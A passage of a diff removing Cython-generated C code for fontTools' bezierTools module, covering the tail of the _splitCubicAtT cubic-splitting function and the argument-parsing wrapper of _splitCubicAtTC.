t1_2) * delta - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - */ - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ay, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_4, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":752 - * b1x = (3 * ax * t1 + bx) * delta_2 - * b1y = (3 * ay * t1 + by) * delta_2 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta # <<<<<<<<<<<<<< - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - */ - __pyx_t_4 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_bx, 2, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_4, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_1, __pyx_v_cx); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ax, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_8 = PyNumber_Multiply(__pyx_t_1, __pyx_v_t1_2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_4, __pyx_t_8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Multiply(__pyx_t_1, __pyx_v_delta); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1x, __pyx_t_8); - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":753 - * b1y = (3 * ay * t1 + by) * delta_2 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta # <<<<<<<<<<<<<< - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - */ - __pyx_t_8 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_by, 2, 0, 0); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_8, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ay, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_8, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":754 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx # <<<<<<<<<<<<<< - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_t1_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_v_bx, __pyx_v_t1_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_8 = PyNumber_Add(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_v_cx, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Add(__pyx_t_8, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_4, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_d1x, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":755 - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy # <<<<<<<<<<<<<< - * pt1, pt2, pt3, pt4 = calcCubicPoints( - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_t1_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_v_by, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_8 = PyNumber_Add(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_v_cy, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Add(__pyx_t_8, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_1, __pyx_v_dy); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_d1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":756 - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( # <<<<<<<<<<<<<< - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_calcCubicPoints); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":757 - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) # <<<<<<<<<<<<<< - * ) - * segments.append((pt1, pt2, pt3, pt4)) - */ - __pyx_t_8 = PyTuple_New(2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_INCREF(__pyx_v_a1x); - __Pyx_GIVEREF(__pyx_v_a1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_a1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_a1y); - __Pyx_GIVEREF(__pyx_v_a1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_v_a1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_9 = PyTuple_New(2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_INCREF(__pyx_v_b1x); - __Pyx_GIVEREF(__pyx_v_b1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 0, __pyx_v_b1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b1y); - __Pyx_GIVEREF(__pyx_v_b1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 1, __pyx_v_b1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_INCREF(__pyx_v_c1x); - __Pyx_GIVEREF(__pyx_v_c1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_v_c1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c1y); - __Pyx_GIVEREF(__pyx_v_c1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_v_c1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_11 = PyTuple_New(2); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __Pyx_INCREF(__pyx_v_d1x); - __Pyx_GIVEREF(__pyx_v_d1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_11, 0, __pyx_v_d1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_d1y); - __Pyx_GIVEREF(__pyx_v_d1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_11, 1, __pyx_v_d1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_12 = NULL; - __pyx_t_13 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_12 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_12)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_12); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_13 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_12, __pyx_t_8, __pyx_t_9, __pyx_t_10, __pyx_t_11}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_13, 4+__pyx_t_13); - __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_4))) || (PyList_CheckExact(__pyx_t_4))) { - PyObject* sequence = __pyx_t_4; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 756, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_11 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_10 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_11 = PyList_GET_ITEM(sequence, 1); - __pyx_t_10 = PyList_GET_ITEM(sequence, 2); - __pyx_t_9 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(__pyx_t_9); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_11,&__pyx_t_10,&__pyx_t_9}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_11,&__pyx_t_10,&__pyx_t_9}; - __pyx_t_8 = PyObject_GetIter(__pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_8); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_5(__pyx_t_8); if (unlikely(!item)) goto __pyx_L13_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_8), 4) < 0) __PYX_ERR(0, 756, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - goto __pyx_L14_unpacking_done; - __pyx_L13_unpacking_failed:; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 756, __pyx_L1_error) - __pyx_L14_unpacking_done:; - } - - /* "fontTools/misc/bezierTools.py":756 - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( # <<<<<<<<<<<<<< - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - * ) - */ - __Pyx_XDECREF_SET(__pyx_v_pt1, __pyx_t_1); - __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt2, __pyx_t_11); - __pyx_t_11 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt3, __pyx_t_10); - __pyx_t_10 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt4, __pyx_t_9); - __pyx_t_9 = 0; - - /* "fontTools/misc/bezierTools.py":759 - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - * ) - * segments.append((pt1, pt2, pt3, pt4)) # <<<<<<<<<<<<<< - * return segments - * - */ - __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 759, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_pt1)) __PYX_ERR(0, 759, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_v_pt2)) __PYX_ERR(0, 759, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_pt3)) __PYX_ERR(0, 759, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_v_pt4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_v_pt4)) __PYX_ERR(0, 759, __pyx_L1_error); - __pyx_t_3 = __Pyx_PyList_Append(__pyx_v_segments, __pyx_t_4); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 759, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":737 - * cx, cy = c - * dx, dy = d - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":760 - * ) - * segments.append((pt1, pt2, pt3, pt4)) - * return segments # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_segments); - __pyx_r = __pyx_v_segments; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_XDECREF(__pyx_t_12); - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ts); - __Pyx_XDECREF(__pyx_v_segments); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_i); - __Pyx_XDECREF(__pyx_v_t1); - __Pyx_XDECREF(__pyx_v_t2); - __Pyx_XDECREF(__pyx_v_delta); - __Pyx_XDECREF(__pyx_v_delta_2); - __Pyx_XDECREF(__pyx_v_delta_3); - __Pyx_XDECREF(__pyx_v_t1_2); - __Pyx_XDECREF(__pyx_v_t1_3); - __Pyx_XDECREF(__pyx_v_a1x); - __Pyx_XDECREF(__pyx_v_a1y); - __Pyx_XDECREF(__pyx_v_b1x); - __Pyx_XDECREF(__pyx_v_b1y); - __Pyx_XDECREF(__pyx_v_c1x); - __Pyx_XDECREF(__pyx_v_c1y); - __Pyx_XDECREF(__pyx_v_d1x); - __Pyx_XDECREF(__pyx_v_d1y); - __Pyx_XDECREF(__pyx_v_pt1); - __Pyx_XDECREF(__pyx_v_pt2); - __Pyx_XDECREF(__pyx_v_pt3); - __Pyx_XDECREF(__pyx_v_pt4); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_45generator1(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_44_splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_43_splitCubicAtTC, "_splitCubicAtTC(double complex a, double complex b, double complex c, double complex d, *ts)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_44_splitCubicAtTC = {"_splitCubicAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_44_splitCubicAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_43_splitCubicAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_44_splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_c; - __pyx_t_double_complex __pyx_v_d; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitCubicAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, 1); __PYX_ERR(0, 763, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, 2); __PYX_ERR(0, 763, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, 3); __PYX_ERR(0, 763, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "_splitCubicAtTC") < 0)) __PYX_ERR(0, 763, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - __pyx_v_b = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - __pyx_v_c = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - 